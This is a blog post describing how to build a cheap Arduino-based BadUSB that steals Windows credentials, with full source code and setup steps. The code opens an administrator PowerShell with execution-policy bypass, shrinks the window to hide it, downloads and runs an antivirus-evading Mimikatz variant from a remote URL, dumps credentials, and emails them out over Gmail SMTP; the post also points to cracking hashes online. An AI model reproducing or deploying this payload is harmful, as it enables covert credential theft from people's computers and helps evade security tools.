Home-made Rubber Ducky's, Snagging Window's Credentials in 15 seconds
I’ve always been very interested by the social engineering
side of cyber security. A report
from cyber security firm Agari includes results from polling 200 professionals
from varying sectors. They had found that 60% of the security leaders said
their organisation most likely had been victim to a social engineering attack
in just the past year, and in 65% of those attacks employee’s credentials had
been snagged. I did some research into the different types of social engineering
attacks, the usual phishing emails containing malicious macros
seemed to be the downfall of a lot of organisations.
A tool called the Rubber Ducky
from Hak5 caught my eye. Hak5 state “Take
Social Engineering to the next level with a USB Rubber Ducky Deluxe” and I can
see why. The rubber ducky is known as a HID (Human Interface Device) attack,
and takes advantage of the fact that computers inherently trust HID for convenience
sake. Once plugged in the rubber ducky will simulate a keyboard with no interruptions
as the OS thinks it’s just a human typing away. Now perhaps you’re wondering what
can be done with this breach of trust? Well keystrokes can be passed in according to Hak5 at over 1000 words per minute. So, you only need to distract
someone from a computer for 15 seconds instead of the 5 minutes it might take
you to type manually.
The problem is Rubber Ducky’s are expensive and must be
shipped from America. After a little research, I discovered you could use
Arduino boards if they use the ATMEGA32U4 chip, which can essentially simulate
a keyboard. I ended up ordering a BadUsbBeetle from eBay for £6.45, much more reasonable than a rubber ducky. You can
go even cheaper
at £1.30 however these have less flash memory and look a lot more conspicuous. In
the end, I ordered the Bad Beetle and about a week later my package from China
arrived.
In that time, I came across a tool called Mimikatz. Mimikatz can
extract plaintext credentials from memory, password hashes from local
SAM/NTDS.dit databases, advanced Kerberos functionality, and more. Sounds
amazing right!? Right away I knew my mission was to combine my BadUsb and Mimikatz.
As the BadUsb doesn’t have onboard storage, we must
download Mimikatz, and upload the results elsewhere, luckily Windows now uses Powershell.
Powershell is our ally and this will be the main area of our attack as it can
do everything we need and the execution is done in memory so it makes it harder
for AV to detect as we never touch the disk. Also, our session will be erased
once we finish as Powershell usually won’t keep session history. So, we can use
PowerShell’s built in download function to download Mimikatz, and use Powershell
to email the results straight to us, perfect!
The first obstacle was getting PowerShell to run as
administrator so we have permission (to be able download and use a few other commands), just from keyboard commands, which could be achieved by simulating these keyboard presses: (try it if you're on Windows)
Left Ctrl + Esc
Type cmd
Left Ctrl + Left Shift + Enter
Left Arrow + Enter
Type: start powershell -ex by pass && exit
Hit Enter
There you go! Powershell as admin!
The next step was to download Mimikatz with:
IEX (New-Object Net.WebClient).DownloadString('https://example')
Which is where we hit our next big obstacle. Antivirus was catching it every
time, clearly the signature
was known to most AV. So, we must change Mimikatz signature, which is where I came
across this article http://www.blackhillsinfosec.com/?p=5555 This is also a great example of the weaknesses of signature based security.
Once we followed those steps we uploaded our code to GitHub
and got a shortened URL git.io/vywDP to use for our download. Next was to invoke Mimikatz and email the results to
ourselves which we can use with this Powershell script:
$Body = Mimikatz results (here we will use Mimikatz -dumpcreds option)
$EmailFrom = 'gmailname@gmail.com'
$EmailTo = 'gmailname@gmail.com'
$Subject = 'Report'
$SMTPServer = 'smtp.gmail.com'
$SMTPClient = New-Object $Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPClient.EnableSsl = $true
$SMTPClient.Credentials = New-Object
System.Net.NetworkCredential('gmailname', 'gmail password')
$SMTPClient.EnableSsl = $true
$SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body)
This works brilliantly! However, if someone saw this happening
on a monitor it would raise some suspicions. So, I went back make the CMD exit and shrunk the Powershell window with this line:
Bingo! You can snag Windows XP, 7 and 8 credentials in
under 15 seconds, however windows 10 you will only receive a hash, which you
can try and crack yourself or upload to something like https://crackstation.net/ to see the plain
text password.
I have included a copy of the whole code at the bottom of this article.
I have included a copy of the whole code at the bottom of this article.
To try this yourself:
- Download the Arduino IDE https://www.arduino.cc/en/main/software
- Make sure select Tools > Board > Leonardo
- Download the .ino from here (can just copy and paste it in).
- If you are on Linux you will need to change permissions with: sudo usermod -a -G dialout $user
- Make sure you enter your Gmail username and password in the correct place, I suggest you create a new one.
- Click verify, then upload. It will start typing straight away so watch out!
Proof Of Concept Video
This is how the code looks, the delays are to stop the keyboard tumbling over itself:
#include "Keyboard.h"
void typeKey(int key)
{
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
/* Init function */
void setup()
{
// Begining the Keyboard stream and delays to give time for computer to recognise the device
Keyboard.begin();
delay(4000);
// Opens CMD as admin
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_ESC);
Keyboard.releaseAll();
delay(1000);
Keyboard.print("cmd");
delay(400);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(800);
typeKey(KEY_LEFT_ARROW);
typeKey(KEY_RETURN);
delay(1500);
// Opens Powershell as admin and exits CMD
Keyboard.print("start powershell -ex bypass && exit");
typeKey(KEY_RETURN);
delay(2000);
// Shrinks Powershell
Keyboard.print("[console]::WindowHeight=1;[console]::WindowWidth=1");
typeKey(KEY_RETURN);
delay(400);
// Downloads Mimidogz
Keyboard.print("IEX (New-Object Net.WebClient).DownloadString('https://git.io/vywDP')");
typeKey(KEY_RETURN);
delay(5000);
// Invokes Mimidogz
Keyboard.print("$Body = Invoke-MimiDogz -DumpCred");
typeKey(KEY_RETURN);
delay(5000);
// Emails Results and exits
Keyboard.print("$EmailFrom = 'gmailname\"gmail.com'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$EmailTo = 'gmailname\"gmail.com'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$Subject = 'Report'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPServer = 'smtp.gmail.com'");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587)");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.EnableSsl = $true");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.Credentials = New-Object System.Net.NetworkCredential(@gmailname without @gmail.com@, @gmail password@);");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.EnableSsl = $true");
typeKey(KEY_RETURN);
delay(400);
Keyboard.print("$SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body)");
typeKey(KEY_RETURN);
delay(800);
Keyboard.print("exit");
typeKey(KEY_RETURN);
// Ending stream
Keyboard.end();
}
/* Unused endless loop */
void loop() {}
No comments:
Post a Comment